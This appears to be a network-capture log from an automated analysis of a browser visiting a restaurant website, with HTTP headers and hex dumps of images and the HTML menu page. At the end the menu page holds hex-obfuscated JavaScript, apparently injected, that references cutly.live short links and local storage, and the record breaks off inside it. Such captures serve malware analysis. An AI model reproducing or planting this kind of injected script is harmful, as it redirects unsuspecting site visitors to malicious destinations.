                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:33 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:33 GMT
                                                                                                                                                    content-type: image/x-icon
                                                                                                                                                    last-modified: Thu, 28 Sep 2023 00:10:08 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 1150
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:33 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:33 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 04 25 ff 03 03 0b ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii: h( %


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    52192.168.2.449803162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:33 UTC390OUTGET /assets/imgs/Banner_index_image.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:34 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:33 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:45:08 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 603860
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:33 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 14 00 00 02 07 08 06 00 00 00 ee 03 d0 53 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRSpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:34 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 79 08 1c 15 28 82 90 2b ea b2 a4 1a 97 b1 ea 47 46 e9 65 99 db b3 44 e4 da 6a a9 ba f5 02 17 11 07 47 73 3c 4f 06 35 41 81 67 71 97 d9 7f 16 b8 36 9a 9a 80 84 90 8c 60 9a 30 97 08 8a 93 83 93 39 d9 60 b2 f3 61 2b f1 74 70 94 37 d7 51 00 78 99 27 94 52 a0 b2 22 a5 84 97 69 06 11 61 5d 2f 58 96 05 eb f4 1a 1a 49 39 4a 73 3d d8 14 31 40 0c 7c 4a 4e b6 8c b8 63 55 1a 80 df 39 15 07 d0 c4 c1 21 36 45 0a 38 d4 d8 f0 75 59 63 a7 5a 03 13 06 a9 c0 ca 0a 51 41 69 dc 14 57 21 74 d9 78 46 06 61 22 c6 4c c0 64 86 93 29 66 2d 94 24 81 95 90 01 24 4d 58 ed 6d 2c cd 8d 4d 79 d3 0c ec ca 13 f7 65 af 66 86 d7 9c c6 20 9c c6 c0 50 db bc 71 0c 7a a6 d5 00 2c 10 13 98 2a 49 d5 90 d3 02 35 43 59 2f c8 a6 48 59 60 99 20 04 94 62 58 cd 90 78 c6 a7 f4 3b d7 39 c4 8a 55 57 24 3d
                                                                                                                                                    Data Ascii: y(+GFeDjGs<O5Agq6`09`a+tp7Qx'R"ia]/XI9Js=1@|JNcU9!6E8uYcZQAiW!txFa"Ld)f-$$MXm,Myef Pqz,*I5CY/HY` bXx;9UW$=
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: de 7f 8d c9 26 a2 6e 8e 17 25 b8 15 a8 ea 0d 44 7a 80 8a f2 89 1c 0f 33 27 6d 5b 32 d0 44 e0 d9 38 67 10 26 ca 29 63 3a cd 98 e7 19 a9 2b 4d f6 f1 cf f5 7e 20 11 81 61 a5 22 8b ad 45 49 c4 c7 12 00 35 0a 2d c2 4c c4 26 96 14 c4 62 f6 9a c9 5c 52 c8 c8 1d a3 a3 cc 79 ca 84 29 63 31 0d 70 36 1c 8f ab 31 4a fd fe 79 86 89 98 ad 04 25 33 85 02 9c 89 a7 64 2c 46 b6 90 71 11 2a 28 46 45 06 20 33 19 70 fe aa 40 01 92 26 9a 30 99 91 df 9f 9d 6e ad 35 65 4a 17 8f d5 c6 3c 05 74 2d 9f 41 00 12 25 4b c9 35 db e3 82 90 c1 74 91 95 5e 13 6b 3e cd 98 13 21 27 42 36 e0 85 33 e6 9c cc a6 62 9a 78 63 fe 7a 3f 9a ad 05 56 0a 12 31 24 38 ad 0b 14 17 36 ac 13 60 d9 9d c6 45 7d ff 26 ec 55 0a 29 54 51 59 05 0c c3 a4 c0 09 6c 93 11 12 a7 d0 3d 25 92 4a dc cc bf 21 31 33 59 04
                                                                                                                                                    Data Ascii: &n%Dz3'm[2D8g&)c:+M~ a"EI5-L&b\Ry)c1p61Jy%3d,Fq*(FE 3p@&0n5eJ<t-A%K5t^k>!'B63bxcz?V1$86`E}&U)TQYl=%J!13Y
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 0e eb 23 a0 e8 88 61 b9 99 7b e3 f7 e1 f2 4c 7b 26 58 67 81 f2 dd 7e e9 c1 e4 0a 26 36 80 72 01 f0 8a ea c0 8e a5 53 a6 91 01 b9 63 99 76 81 f4 e6 40 db 80 e0 76 dd 8d c5 d8 4a c9 9b cb af de 82 a3 f4 16 18 48 dc 4a 4d 31 98 33 dc d7 37 ed 2c 87 76 3a b9 cf 94 c6 b7 c0 c4 77 83 fe ef 04 36 df fa fb 47 60 f9 28 b8 de d7 b0 81 d1 77 cb d8 7b 00 e8 0f cc 2c 0c 8c bd 61 ec d0 b7 0c 5a ee cc 6d fa 96 66 25 d3 d6 54 65 64 b0 b6 9f 89 48 67 bc b6 b5 bf 31 d4 29 4d 83 ce 9e 6c dc 74 ef e9 21 b6 6b 6a e3 b5 bd ce 7e 8d 79 30 1e 02 83 1a 8c 59 f6 f7 09 f6 f0 70 74 0f 20 e4 78 3f 5d 59 fb 0f 59 8e 7b ad c4 bd eb 73 fb d9 ff 8e 36 8e 83 28 d3 6d 48 5b ec 97 ae f7 ca 6e e2 12 06 1f f4 40 77 76 eb fc 3c 18 09 3c 9a 5b 1b 0d ca 7d 02 6a 1c 7a e3 fc f9 16 bb 76 5c 2f f7
                                                                                                                                                    Data Ascii: #a{L{&Xg~&6rScv@vJHJM137,v:w6G`(w{,aZmf%TedHg1)Mlt!kj~y0Ypt x?]YY{s6(mH[n@wv<<[}jzv\/
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 26 26 cc 0e 7f 90 19 6a d8 5f d4 50 69 70 f0 98 a0 12 7a 94 a8 2e b8 47 ae ad 08 8a d2 7c b2 8d 9e b0 3b 8f 03 95 09 30 71 67 5e 80 0e 8d 09 d5 e6 6d 33 20 0a e0 f0 38 4d fd 3d fd eb 76 2f 46 00 e4 66 6c 4d e7 72 2c 51 57 ad 5b d3 2f db 26 3a 65 27 0f 60 21 59 60 ad 24 7a 5e 62 3c 37 17 e8 30 70 23 df 4f 7e 3c 39 83 5c 97 19 cb e5 8a f3 97 13 5e 7f c9 b8 70 46 b9 be 42 2f af 56 51 09 e6 eb 7c 33 95 a3 c8 8d 12 db 2d 70 68 b7 20 ad 79 6d 28 2a 35 50 94 3a 68 d7 dc 8d ef 25 06 2a c6 24 03 62 13 ea e6 27 0e b0 13 0d 89 22 6b 3f df 20 9b 02 ea ac 57 66 d7 c5 56 6a 26 24 83 89 8d 05 9d 2b f6 b4 9c 3c 29 eb a5 d3 b4 33 5c 59 01 5f 77 95 36 30 5a d7 44 f2 65 9e c1 e6 63 3f 81 30 31 70 4c 8c 94 04 09 4c 92 27 3b 70 42 9a 7c de e4 ec b1 11 b3 3f df ca 82 93 00 87
                                                                                                                                                    Data Ascii: &&j_Pipz.G|;0qg^m3 8M=v/FflMr,QW[/&:e'`!Y`$z^b<70p#O~<9\^pFB/VQ|3-ph ym(*5P:h%*$b'"k? WfVj&$+<)3\Y_w60ZDec?01pLL';pB|?
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: f9 c9 40 e0 c7 f3 cc 60 c3 8c 50 a2 f5 30 55 d1 07 bf fb 3e e5 99 33 09 36 bc 70 73 63 bb 85 4d 3c de 8b c9 a6 d9 e6 8f d6 5a b0 26 f3 ff 8d e0 83 8f 98 99 44 84 d5 15 cc c1 50 6c 35 98 bb 6e 31 86 6a ad 90 a7 4b ec 1d a1 80 9d ad 0b dc 6c db 6e 6d e3 b2 70 36 24 76 4f 51 00 e0 42 5b a3 62 34 2b 62 2d cd b1 3c 98 73 c2 db 3d 10 32 4a 21 87 61 ef 17 ed 2c dd 71 1f e4 3d 47 7b f0 81 6f 4c 28 55 05 d3 79 0c 0c f6 e2 47 d7 71 8c f9 d8 19 03 da 1b 85 87 e4 7b 40 d1 dd d1 65 3f c7 83 45 34 d8 57 aa 86 de 33 30 85 01 4a d9 36 88 42 21 68 86 76 db 65 e9 44 25 00 67 65 88 4e 60 6a e0 b9 a2 88 43 dc e0 ce 01 58 16 06 34 e6 e9 9e 69 d0 61 59 61 c7 fb 2d e6 0a 11 08 ef 8c fa 52 0a 98 04 83 1a ee de 3f 64 fa 1c ed 2a 34 58 6d 84 9c 45 4d 15 e4 0f a9 de 0f 80 e2 f0 26
                                                                                                                                                    Data Ascii: @`P0U>36pscM<Z&DPl5n1jKlnmp6$vOQB[b4+b-<s=2J!a,q=G{oL(UyGq{@e?E4W30J6B!hveD%geN`jCX4iaYa-R?d*4XmEM&
                                                                                                                                                    2024-10-01 04:26:34 UTC8192INData Raw: ba 4c 90 e9 0a ad 00 a1 42 4a 39 01 11 03 68 d3 0d e0 da 25 8e 3b a0 58 d0 7b 8d d0 91 26 a7 10 86 0d 58 d3 9d 89 b7 ae 2b de de de f0 f2 22 78 25 c7 ed 16 7e 84 aa 40 5a e6 fd d5 60 33 91 6c 05 62 aa 86 0e cc 50 80 5a 6e 84 1e a5 5e 5b 61 af 67 13 fe cc af 65 27 62 07 40 35 99 13 f1 dc 63 5c 6e 00 2c ef b6 04 31 7e 79 ef 50 90 c1 69 80 42 86 c8 9d 26 ec 0f 07 ab 80 3d a8 7f 8e 02 65 21 e3 02 15 06 81 a1 9d e1 46 e1 39 27 0c 93 21 9b 0c 80 a0 a3 9f 00 1c c1 2e 15 03 1c 2e 09 26 52 dc 27 85 46 56 65 80 ee 56 86 f7 1a 36 40 12 20 14 e3 03 e0 11 49 96 c6 41 65 e9 25 c6 a2 4a 6c f2 79 6c d7 6c 37 5b db 66 5d 07 09 c2 2b 4d 98 51 58 88 4b 41 89 3d 22 f1 14 3e b6 54 0c ce dd e3 04 29 e0 2d 52 b5 bd 03 de f6 87 28 78 57 a9 41 64 7f 94 c2 a8 03 70 cd 6b 3a 15 06
                                                                                                                                                    Data Ascii: LBJ9h%;X{&X+"x%~@Z`3lbPZn^[age'b@5c\n,1~yPiB&=e!F9'!..&R'FVeV6@ IAe%Jlyll7[f]+MQXKA=">T)-R(xWAdpk:
                                                                                                                                                    2024-10-01 04:26:34 UTC16384INData Raw: 75 70 00 e7 c3 db 53 61 e1 9f 2a 8c 4a 0c ed 44 ce 91 a4 15 4c f6 06 74 83 a1 84 a0 35 7c 32 3e 5c 89 b3 5e f5 88 e8 70 0c 87 18 38 e8 46 9b ad 23 d4 3c ce 9b 19 48 13 a0 b3 44 e8 49 b7 d0 2e 22 d2 f0 e0 2d 4e f5 15 84 27 10 15 22 66 a7 2e f0 d2 e1 5e 86 07 b4 c3 4b d4 e3 0c 22 d3 b0 04 4e e2 9d a9 6f f2 66 44 7d 4d ee 6e 96 60 2b f3 14 52 f3 2a 40 a9 44 52 08 2c ee 52 c9 99 41 81 11 9a 53 87 c1 5d cd dc 4d 63 8e e9 3d 18 d5 da a3 f1 d8 db 30 af f4 d5 1a 6e d6 70 27 26 77 27 55 b5 e1 cd 3d ea f8 c1 4a 7c 6c 58 f8 5e 64 92 7d 87 13 31 6e b4 87 c6 a9 7f 00 64 f9 0f c0 46 c2 f7 19 74 27 a9 f3 26 87 de eb 2b 22 22 cf f0 c2 9d c2 1c cd 19 62 66 57 22 32 87 57 30 d8 88 c4 00 f1 ee 22 0e 49 40 b1 25 f3 95 a0 a8 ea 58 cd 70 51 42 58 7d 32 a4 6b 92 37 42 5a cf c7
                                                                                                                                                    Data Ascii: upSa*JDLt5|2>\^p8F#<HDI."-N'"f.^K"NofD}Mn`+R*@DR,RAS]Mc=0np'&w'U=J|lX^d}1ndFt'&+""bfW"2W0"I@%XpQBX}2k7BZ


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    53192.168.2.449807162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:34 UTC367OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:34 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:34 GMT
                                                                                                                                                    content-type: image/x-icon
                                                                                                                                                    last-modified: Thu, 28 Sep 2023 00:10:08 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 1150
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:34 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:34 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 04 25 ff 03 03 0b ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii: h( %


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    54192.168.2.449817162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:43 UTC665OUTGET /dineInMenu HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:44 UTC251INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    transfer-encoding: chunked
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:44 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:44 UTC16133INData Raw: 44 41 32 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 61 67 72 61 50 72 6f 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 66 67 68 61 6e 20 48 61 79 61 74 20 52 65 73 74 61 75 72 61 6e 74 3c 2f 74 69 74 6c 65 3e 0d
                                                                                                                                                    Data Ascii: DA2C<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="author" content="AdagraPro"> <title>Afghan Hayat Restaurant</title>
                                                                                                                                                    2024-10-01 04:26:44 UTC5499INData Raw: 09 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 69 6d 67 73 2f 6d 65 6e 75 5f 69 6d 67 65 73 2f 4d 65 61 74 5f 42 61 6c 6c 5f 43 75 72 72 79 2e 70 6e 67 22 20 61 6c 74 3d 22 41 66 67 20 4d 65 6e 75 20 49 6d 61 67 65 22 20 2f 3e 0d 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 68 35 63 6f 2d 66 6f 6f 64 2d 64 65 73 63 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 68 35 3e 4d 65 61 74 20 42 61 6c 6c 20 43 75 72 72 79 20 20 28 4b 6f 66 74 61 29 20 3c 2f 68 35 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 70 3e 4c 61 6d 62 20 6d 69 6e 63 65 20 6d 61 72 69 6e 61 74 65 64 20 77 69 74 68 20 64 69 63 65 64 20 6f 6e 69 6f 6e 73
                                                                                                                                                    Data Ascii: <img src="assets/imgs/menu_imges/Meat_Ball_Curry.png" alt="Afg Menu Image" /></div><div class="fh5co-food-desc"><div><h5>Meat Ball Curry (Kofta) </h5><p>Lamb mince marinated with diced onions
                                                                                                                                                    2024-10-01 04:26:44 UTC16384INData Raw: 6f 6b 65 64 20 70 61 73 74 72 79 20 66 69 6c 6c 65 64 20 77 69 74 68 20 63 68 69 76 65 73 20 61 6e 64 20 6c 65 65 6b 2c 20 74 6f 70 70 65 64 20 77 69 74 68 20 61 20 72 69 63 68 20 6d 69 78 65 64 20 6c 65 6e 74 69 6c 20 67 72 61 76 79 20 61 6e 64 20 79 6f 67 68 75 72 74 2c 20 73 65 72 76 65 64 20 77 69 74 68 20 62 72 65 61 64 20 28 4e 61 61 6e 29 20 61 6e 64 20 64 69 70 73 20 28 43 68 61 74 6e 69 29 2e 20 28 36 20 70 69 65 63 65 73 29 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 68 35 63 6f 2d 66 6f 6f 64 2d 70 72 69 63 69 6e 67 22 3e 24 33 35 2e 30 30 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0d 0a 09 09
                                                                                                                                                    Data Ascii: oked pastry filled with chives and leek, topped with a rich mixed lentil gravy and yoghurt, served with bread (Naan) and dips (Chatni). (6 pieces)</p></div></div><div class="fh5co-food-pricing">$35.00</div></li>
                                                                                                                                                    2024-10-01 04:26:44 UTC16384INData Raw: 6c 65 43 68 65 63 6b 27 2c 27 5c 78 36 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 33 61 5c 78 32 66 5c 78 32 66 5c 78 36 33 5c 78 37 35 5c 78 37 34 5c 78 36 63 5c 78 37 39 5c 78 32 65 5c 78 36 63 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 32 66 5c 78 34 32 5c 78 37 30 5c 78 35 33 5c 78 33 33 5c 78 36 33 5c 78 33 38 33 27 2c 27 5c 78 36 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 33 61 5c 78 32 66 5c 78 32 66 5c 78 36 33 5c 78 37 35 5c 78 37 34 5c 78 36 63 5c 78 37 39 5c 78 32 65 5c 78 36 63 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 32 66 5c 78 34 34 5c 78 36 33 5c 78 35 30 5c 78 33 30 5c 78 36 33 5c 78 33 39 30 27 2c 27 72 61 6e 64 6f 6d 27 2c 27 2d 6c 6f 63 61 6c 2d 73 74 6f 72 61 67 65 27 2c 27 5c 78 36 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 33
                                                                                                                                                    Data Ascii: leCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x42\x70\x53\x33\x63\x383','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x44\x63\x50\x30\x63\x390','random','-local-storage','\x68\x74\x74\x70\x3
